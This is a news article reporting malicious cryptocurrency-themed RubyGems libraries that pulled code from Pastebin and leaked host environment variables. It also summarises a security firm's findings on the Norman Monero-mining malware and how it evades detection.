Programming Language Ruby Hit with Cryptojacking Malware Plague

A cryptojacking code has been discovered in several open-source code libraries written in Ruby, and it seems that they have been able to spread rather rapidly.

According to a report by tech news medium Decrypt, RubyGems, a package manager for the Ruby programming language, was seemingly corrupted by malicious software that was downloaded and installed by hackers. Upon infecting the code libraries, hackers were said to have reposted it on the RubyNews platform, thus rendering anyone who downloads the code vulnerable.

The malicious code was first noticed by a GitHub user, who published a complaint about the issue earlier this week. In his post, the user explained that the library vegan to download the additional code from Pastebin, a popular text housing service. This download, according to the post, is what will initiate the malware.

The malware will essentially send the address of the infected host to the attackers, as well as other “environmental variables,” which could include some private credentials. As far as solutions go, some users have suggested that contributors to RubyGems could enable two-factor authentication on their accounts.

Decrypt noted that 5 of the 11 libraries that were affected were specific to cryptocurrencies. They had names such as doge-coin, bitcoin_vanity, coin_base, and blockchain_wallet. It further noted that coin_base and blockchain_wallet  were uploaded as far back as last month. coin_base had already been downloaded up to 424 times, while blockchain_wallet had 423 downloads as well.

It added that thousands of people have already been exposed to the malware, although an exact number couldn’t be given, Decrypt also admitted that it wasn’t sure if the attackers had been able to steal any cryptocurrencies with the malware.

Cryptojacking has actually been in the news recently. With this theft method, attackers have been able to capitalize on people who buy cryptocurrency, Bitcoin miners, and high powered computers, to get rich. However, even in the field of cryptojacking, it would seem that there are levels of threat. The most significant of these malware would have to be Norman, a cryptojacking malware that mines privacy-focused altcoin Monero (XMR), a popular currency on cryptocurrency exchanges.

Norman was discovered just last week, according to a research report from cybersecurity firm Varonis. In the report, Vaonis detailed that they discovered the malware after being called to perform clean-up on a cyberattack that affected a mid-sized company. The malware is reportedly based on XMRig, a high-performance miner for XMR.

However, its standout feature will have to be its ability to evade detection. Varonis revealed that Norman closes its crypto mining process automatically as soon as it detects that the host user has opened up the computer’s Task Manager.

Once the user “cleans up” the computer and is satisfied, the Task Manager is closed, and Norman gets right back to work.

The researchers also concluded that Norman is based on the PHP programming language, and it employs Zend Guard to help keep its operations under wraps. They also reportedly found French variables and functions in the virus’ code, prompting them to believe that it was developed by hackers from France (or at the very least, a French-speaking country).